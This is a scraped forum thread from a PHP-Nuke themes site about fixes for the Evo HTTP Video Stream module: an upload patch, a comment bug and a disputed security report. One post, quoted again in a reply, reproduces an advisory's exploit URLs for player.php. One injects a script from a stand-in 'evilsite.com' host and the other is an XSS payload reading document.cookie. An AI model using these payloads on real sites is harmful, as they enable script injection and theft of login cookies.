Clan Adverts

Sponsors

CT on Facebook

Latest Product

Battlefield 3 Stats Module
Battlefield 3 Stats Module

User Box

Anonymous
38.107.179.218
Nickname:

Password:

Security Code
Security Code
Type Security Code


PND Downloads Feed

Phpnuke Downloads
How to Delete or Reset yo...
How to Delete or Reset your PHPNuke Admin Account
Lost your admin password ?  Cant login to your admin account ?This sh...
Back Online & Stuff
Back Online & Stuff
Look at us with our nifty website back up and running… Seriousl...
How to edit the admins in...
How to edit the admins in the forums
Here is a way to make someone admin in your forums on your Evo site. I...
Demo Splash Screen
Demo Splash Screen
Ped @ Clan Themes has released a simple splash screen entrance hack. ...
Free Phpnuke Business The...
Free Phpnuke Business Theme 6
This is the 6th Business theme for Phpnuke that Clan Themes has releas...
Tricked Out Slider
Tricked Out Slider
We have seen some great new things come out of Tricked Out News and th...

Custom Work

PHP Nuke Custom Work

www.clanthemes.com :: View topic - Evo - http video stream v4.5.3 v2 **upload fix**
Evo - http video stream v4.5.3 v2 **upload fix**
Goto page 1, 2  Next

23 Replies / 3015 Views
Post new topic   Reply to topic  

   www.clanthemes.com Forum Index » Modules

View previous topic :: View next topic

DreAdeDcoRpSE
Reputation: 2221.6 Add RepSubtract Rep
votes: 28
Local time: 4:06 AM
Location: Back of your Mind
usa.gif

 Forums Moderator
Forums Moderator

1.53 posts per day
Medals: 3 (View more...)
Dedication (Amount: 1)
Site Admin
Site Admin
Joined: Sep 22, 2007
Last Visit: 10 Feb 2012
Posts: 2459
Points: 128885 
Post Evo - http video stream v4.5.3 v2 **upload fix** Posted: Sun Jun 21, 2009 7:36 pm
Shop Purchases:Enemy Territory Theme (Aviator) for PHP Nuke · Clan Roster 2.0 ·  · Modern Warfare 3 Xtreme Theme
I know there are a bunch of you out there using the Evo - HTTP Video Stream v4.5.3 V2 module. I was pointed out that there was a problem with the pop-up upload option. Simple fix so all you have to do is download the provided and replace your javascript.php file in the folder

public_html/modules/Video_Stream/

thats it.
If there is anything else that people find, feel free to let me know.
javascript.zip
 Description:

Download
 Filename:  javascript.zip
 Filesize:  1.37 KB
 Downloaded:  45 Time(s)
 

 
View user's profileSend private messageVisit poster's website Reply with quote

clyde4210
Reputation: 395.3 Add RepSubtract Rep
Local time: 4:06 AM

blank.gif

 OMG
OMG

0.11 posts per day
Medals: 0
Joined: Oct 24, 2007
Last Visit: 24 Jul 2009
Posts: 167
Points: 7534 
Post Evo - http video stream v4.5.3 v2 **upload fix** Posted: Thu Jul 09, 2009 6:42 pm
What was all that security issue with this module? Has it been fixed?
 

 
View user's profileSend private messageVisit poster's website Reply with quote

DreAdeDcoRpSE
Reputation: 2221.6 Add RepSubtract Rep
votes: 28
Local time: 4:06 AM
Location: Back of your Mind
usa.gif

 Forums Moderator
Forums Moderator

1.53 posts per day
Medals: 3 (View more...)
Site Supporter (Amount: 1)
Site Admin
Site Admin
Joined: Sep 22, 2007
Last Visit: 10 Feb 2012
Posts: 2459
Points: 128885 
Post Re: Evo - http video stream v4.5.3 v2 **upload fix** Posted: Thu Jul 09, 2009 8:22 pm
Shop Purchases:Enemy Territory Theme (Aviator) for PHP Nuke · Clan Roster 2.0 ·  · Modern Warfare 3 Xtreme Theme
clyde4210 wrote:
What was all that security issue with this module? Has it been fixed?


I don't know of any security issue with this module, considering it does not host the video's, just allows you to input URLS of streaming videos easily. Pretty nice module.
 

 
View user's profileSend private messageVisit poster's website Reply with quote


clyde4210
Reputation: 395.3 Add RepSubtract Rep
Local time: 4:06 AM

blank.gif

 OMG
OMG

0.11 posts per day
Medals: 0
Joined: Oct 24, 2007
Last Visit: 24 Jul 2009
Posts: 167
Points: 7534 
Post Evo - http video stream v4.5.3 v2 **upload fix** Posted: Thu Jul 09, 2009 9:22 pm
Quote:
player.php is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the player.php script. A remote attacker could exploit this vulnerability using the defaultVisualExt in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.


http://www.futurenuke.com/modules.php?name=News&file=article&sid=165

Code:
RFI Example: http://www.site.com/path/player.php?&defaultVisualExt=1<ScRiPt+src=http://evilsite.com/gobaby.js? you get the picture :)
XSS Example: http://www.site.com/path/player.php?&defaultVisualExt=1>"><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>


I'm not finding that code 'defaultVisualExt' anywhere in there. Player.php isn't even in the copy I got my hands on.
 

 
View user's profileSend private messageVisit poster's website Reply with quote

Snype
Reputation: 305.5 Add RepSubtract Rep
votes: 8
Local time: 9:06 AM
Location: lincolshire
uk.gif

0.60 posts per day
Medals: 1 (View more...)
Site Supporter (Amount: 1)
Respected Member
Respected Member
Joined: May 20, 2008
Last Visit: 06 Nov 2011
Posts: 812
Points: 60742 
Post Evo - http video stream v4.5.3 v2 **upload fix** Posted: Thu Jul 09, 2009 10:03 pm
Shop Purchases:Call of Duty 4 SAS Theme
that has nothing to do with this module baxr found an exploit in a file player.php from the package nuke-evolution xteme and player.php i believe is linked with the wimpy player?
 

WebSite > http://www.phpnukeblog.info Xfire > DDsnype MSN > ritchietaylor@live.co.uk Email > admin@phpnukeblog.info  
View user's profileSend private messageVisit poster's websiteMSN Messenger Reply with quote

DreAdeDcoRpSE
Reputation: 2221.6 Add RepSubtract Rep
votes: 28
Local time: 4:06 AM
Location: Back of your Mind
usa.gif

 Forums Moderator
Forums Moderator

1.53 posts per day
Medals: 3 (View more...)
Super Dedicated User (Amount: 1)
Site Admin
Site Admin
Joined: Sep 22, 2007
Last Visit: 10 Feb 2012
Posts: 2459
Points: 128885 
Post Re: Evo - http video stream v4.5.3 v2 **upload fix** Posted: Thu Jul 09, 2009 10:07 pm
Shop Purchases:Enemy Territory Theme (Aviator) for PHP Nuke · Clan Roster 2.0 ·  · Modern Warfare 3 Xtreme Theme
clyde4210 wrote:
Quote:
player.php is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the player.php script. A remote attacker could exploit this vulnerability using the defaultVisualExt in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.


http://www.futurenuke.com/modules.php?name=News&file=article&sid=165

Code:
RFI Example: http://www.site.com/path/player.php?&defaultVisualExt=1<ScRiPt+src=http://evilsite.com/gobaby.js? you get the picture :)
XSS Example: http://www.site.com/path/player.php?&defaultVisualExt=1>"><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>


I'm not finding that code 'defaultVisualExt' anywhere in there. Player.php isn't even in the copy I got my hands on.


That error is with Nuke Evolution Extreme, not with this module. How and why, and where were you getting that, that error is with this module? They mention nothing about this module, nor made any kind of reference.
 

 
View user's profileSend private messageVisit poster's website Reply with quote


clyde4210
Reputation: 395.3 Add RepSubtract Rep
Local time: 4:06 AM

blank.gif

 OMG
OMG

0.11 posts per day
Medals: 0
Joined: Oct 24, 2007
Last Visit: 24 Jul 2009
Posts: 167
Points: 7534 
Post Evo - http video stream v4.5.3 v2 **upload fix** Posted: Thu Jul 09, 2009 10:39 pm
He originally posted it as Video Stream 4.5.3 but anyways snipe has the correct answer. He should have said wimpy player or mp3 player.

Thanks for the quick reply.
 

 
View user's profileSend private messageVisit poster's website Reply with quote

GhOsTxxx
Reputation: 508.9 Add RepSubtract Rep
Local time: 4:06 AM

blank.gif

 Tree Hugger
Tree Hugger

0.04 posts per day
Medals: 0
Joined: Oct 01, 2007
Last Visit: 18 Apr 2011
Posts: 58
Points: 10791 
Post Evo - http video stream v4.5.3 v2 **upload fix** Posted: Sun Nov 29, 2009 1:53 pm
Shop Purchases:World of Warcraft Splash Screen · WOW Wrath Of The Lich King Theme · Modern Gamer Evo Multi Theme  · Call of Duty: Black Ops Age Gate Splash Screen
love this mod. But i have a small problem. When someone adds a comment the comment box appears underneath as it should but there is no comment in the actual box Zipped

anyone know what im doing wrong?
many thanks
 

 
View user's profileSend private message Reply with quote

DreAdeDcoRpSE
Reputation: 2221.6 Add RepSubtract Rep
votes: 28
Local time: 4:06 AM
Location: Back of your Mind
usa.gif

 Forums Moderator
Forums Moderator

1.53 posts per day
Medals: 3 (View more...)
Dedication (Amount: 1)
Site Admin
Site Admin
Joined: Sep 22, 2007
Last Visit: 10 Feb 2012
Posts: 2459
Points: 128885 
Post Re: Evo - http video stream v4.5.3 v2 **upload fix** Posted: Sun Nov 29, 2009 2:54 pm
Shop Purchases:Enemy Territory Theme (Aviator) for PHP Nuke · Clan Roster 2.0 ·  · Modern Warfare 3 Xtreme Theme
GhOsTxxx wrote:
love this mod. But i have a small problem. When someone adds a comment the comment box appears underneath as it should but there is no comment in the actual box Zipped

anyone know what im doing wrong?
many thanks


I was just confronted with this problem a couple of weeks ago, I have had no time to take a look at it yet, for I been busy trying to finish up a map for COD4 which is soon to be released publicly, after I can get it beta tested. If someone else feels like take a look into it, then just post the fix in this thread and I will sticky it and update the DL, other wise, I will look into it once the map is released. Till then, I have no answers.
 

 
View user's profileSend private messageVisit poster's website Reply with quote


GhOsTxxx
Reputation: 508.9 Add RepSubtract Rep
Local time: 4:06 AM

blank.gif

 Tree Hugger
Tree Hugger

0.04 posts per day
Medals: 0
Joined: Oct 01, 2007
Last Visit: 18 Apr 2011
Posts: 58
Points: 10791 
Post Evo - http video stream v4.5.3 v2 **upload fix** Posted: Sun Nov 29, 2009 3:03 pm
Shop Purchases:World of Warcraft Splash Screen · WOW Wrath Of The Lich King Theme · Modern Gamer Evo Multi Theme  · Call of Duty: Black Ops Age Gate Splash Screen
thank you for the reply. good luck with the new map :D
 

 
View user's profileSend private message Reply with quote

DreAdeDcoRpSE
Reputation: 2221.6 Add RepSubtract Rep
votes: 28
Local time: 4:06 AM
Location: Back of your Mind
usa.gif

 Forums Moderator
Forums Moderator

1.53 posts per day
Medals: 3 (View more...)
Site Supporter (Amount: 1)
Site Admin
Site Admin
Joined: Sep 22, 2007
Last Visit: 10 Feb 2012
Posts: 2459
Points: 128885 
Post Re: Evo - http video stream v4.5.3 v2 **upload fix** Posted: Sun Nov 29, 2009 3:09 pm
Shop Purchases:Enemy Territory Theme (Aviator) for PHP Nuke · Clan Roster 2.0 ·  · Modern Warfare 3 Xtreme Theme
thanks, its done and all test have good good thus far, just need more beta testers.
 

 
View user's profileSend private messageVisit poster's website Reply with quote

vash_d1
Reputation: 492.1 Add RepSubtract Rep
Local time: 4:06 AM

usa.gif

 Noob
Noob

0.01 posts per day
Medals: 0
Joined: May 29, 2007
Last Visit: 07 Nov 2011
Posts: 16
Points: 952 
Post Evo - http video stream v4.5.3 v2 **upload fix** Posted: Sat Aug 14, 2010 2:50 am
On the matter of the comments not werking in the HTTP_Video_Stream_V4.53 I found the fix on Nuke Evolution site


"The Fix is this: Open your comment.php page in a good text editor, do not use note pad, it changes things without you knowing.

You are going to change the $Editedmessage variable to $commenttopost .
So look for ALL the $Editedmessage on your comment.php page and change them to $commenttopost. There are 8 of them on the page.
Now save and upload to your server.
Some may have already been change as it was in mine I only had 2 to edit and my comments are working now.
 

 
View user's profileSend private messageVisit poster's website Reply with quote

Post new topic   Reply to topic  
   www.clanthemes.com Forum Index » Modules


 
23 Replies / 3015 Views
Page 1 of 2
All times are GMT
 Goto page 1, 2  Next
Display posts from previous:   
 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum
 

Company Information
Home · About Us · Affiliates · Advertising
Link To Us · Newsletter · Contact Us · Site Map
All content © Clan Themes 2006 - 2012
Based on RavenNuke